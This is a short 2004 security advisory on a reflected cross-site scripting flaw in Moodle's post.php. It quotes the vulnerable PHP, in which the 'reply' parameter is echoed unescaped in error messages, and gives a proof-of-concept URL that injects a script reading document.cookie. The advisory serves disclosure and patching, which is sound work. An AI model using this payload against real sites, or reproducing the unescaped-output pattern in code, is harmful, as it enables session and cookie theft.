xss in moodle (post.php)
+--------------------------------+
| |
| XSS in Moodle < 1.3 (post.php) |
| |
+--------------------------------+
Autor: Javier Ubilla Brenni <javierubilla[at]spymac.com>
Date: 02/08/04
Software Description:
~~~~~~~~~~~~~~~~~~~~
"Moodle is a course management system (CMS) - a software package designed to
help educators create quality online courses."
www.moodle.org
Bug:
~~~
Post.php is vulnerable to an XXS attack.
The bug was found in the $reply variable :
/* Begin of vulnerable code */
} else if (isset($reply)) { // User is writing a new reply
if (! $parent = forum_get_post_full($reply)) {
error("Parent post ID was incorrect ($reply)");
}
if (! $discussion = get_record("forum_discussions", "id",
$parent->discussion)) {
error("This post is not part of a discussion! ($reply)");
}
if (! $forum = get_record("forum", "id", $discussion->forum)) {
error("The forum number was incorrect ($discussion->forum)");
}
if (! $course = get_record("course", "id", $discussion->course)) {
error("The course number was incorrect ($discussion->course)");
}
if (! forum_user_can_post($forum)) {
error("Sorry, but you can not post in this forum.");
}
if ($cm = get_coursemodule_from_instance("forum", $forum->id,
$course->id)) {
if (groupmode($course, $cm) and !isteacheredit($course->id)) { //
Make sure user can post here
if (mygroupid($course->id) != $discussion->groupid) {
error("Sorry, but you can not post in this discussion.");
}
}
if (!$cm->visible and !isteacher($course->id)) {
error(get_string("activityiscurrentlyhidden"));
}
}
/* End of vulnerable code */
Here is the bug:
if (! $parent = forum_get_post_full($reply)) {
error("Parent post ID was incorrect ($reply)");
Exploit:
~~~~~~~~
http://www.vulnerable.com/moodle/mod/forum/post.php?reply=%3Cscript%3Ealert(document.cookie);%3C/script%3E
Solution:
~~~~~~~~~
Upgrade to the last version
Vendor Status:
~~~~~~~~~~~~~~
Notified.
Credits: Bug found by Javier Ubilla and Ariel.
~~~~~~~